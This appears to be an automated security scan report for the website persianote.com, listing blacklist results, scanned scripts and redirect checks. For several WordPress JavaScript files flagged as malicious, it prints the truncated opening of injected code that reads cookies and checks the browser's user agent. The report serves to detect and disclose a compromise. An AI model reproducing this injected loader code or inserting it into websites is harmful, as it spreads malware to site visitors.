Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=persianote.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://persianote.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.persianote.com/ | 200 OK Content-Length: 50206 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.2sib.com ...[3829 bytes skipped]... t;/script> <script src="http://stats.wordpress.com/e-201438.js" type="text/javascript"></script> <script type="text/javascript"> st_go({v:'ext',j:'1:3.0.2',blog:'36386699',post:'0',tz:'0'}); var load_cmc = function(){linktracker_init(36386699,0,2);}; if ( typeof addLoadEvent != 'undefined' ) addLoadEvent(load_cmc); else load_cmc(); </script><center> <a href="http://www.2sib.com/category/iphone/" target="_blank">اپÙÛÚ©Ûش٠آÛÙÙÙ</a> | <a href="http://www.2sib.com/category/ipad/" target="_blank">اپÙÛÚ©Ûش٠آÛپد</a> | <a href="http://www.2sib.com/" target="_blank">اپÙÛÚ©ÛØ´Ù ÙارسÛ</a> | <a href="http://www.2sib.com/" target="_blank">اپÙÛÚ©Ûش٠٠جاÙÛ</a> | <a href="http://www.2sib.com/" target="_blank">اپÙÛÚ©Ûش٠اÛراÙÛ</a> </center> </body> </html> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://www.persianote.com/wp-content/themes/grido/js/audio-player.js | 200 OK Content-Length: 11502 Content-Type: text/javascript | clean |
http://www.persianote.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 98652 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo jQuery.noConflict(); Antivirus reports:
| ||
http://www.persianote.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 9450 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
https://wprp.zemanta.com/static/js/loader.js?version=3.5.1 | 200 OK Content-Length: 11783 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21412 Content-Type: text/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163628 Content-Type: application/x-javascript | clean |
http://www.persianote.com/wp-content/themes/grido/js/jquery.prettyPhoto.js | 200 OK Content-Length: 25758 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.persianote.com/wp-content/themes/grido/js/jquery.isotope.min.js | 200 OK Content-Length: 15751 Content-Type: text/javascript | clean |
http://www.persianote.com/wp-content/themes/grido/js/script.js | 200 OK Content-Length: 6249 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo $('[placeholder]').parents('form').submit(function() { $(this).find('[placeholder]').each(function() { var input = $(this); if (input.val() == input.attr('placeholder')) { input.val(''); } }) }); $('.back-top a').click(function () { $('body,html').animate({ scrollTop: 0 }, 800); return false; }); $('.post-image .lightbox').prepend('<span class="zoom"></span>'); }); Antivirus reports:
| ||
http://www.persianote.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 17498 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.persianote.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9 | 200 OK Content-Length: 11880 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo } } $.wpcf7SupportHtml5 = function() { var features = {}; var input = document.createElement('input'); features.placeholder = 'placeholder' in input; var inputTypes = ['email', 'url', 'tel', 'number', 'range', 'date']; $.each(inputTypes, function(index, value) { input.setAttribute('type', value); features[value] = input.type !== 'text'; }); return features; }; })(jQuery); Antivirus reports:
| ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Sepaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: persianote.com
Result:
GET / HTTP/1.1
Host: persianote.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: persianote.com
Referer: http://www.google.com/search?q=persianote.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: persianote.com
Referer: http://www.google.com/search?q=persianote.com
Result:
The result is similar to the first query. There are no suspicious redirects found.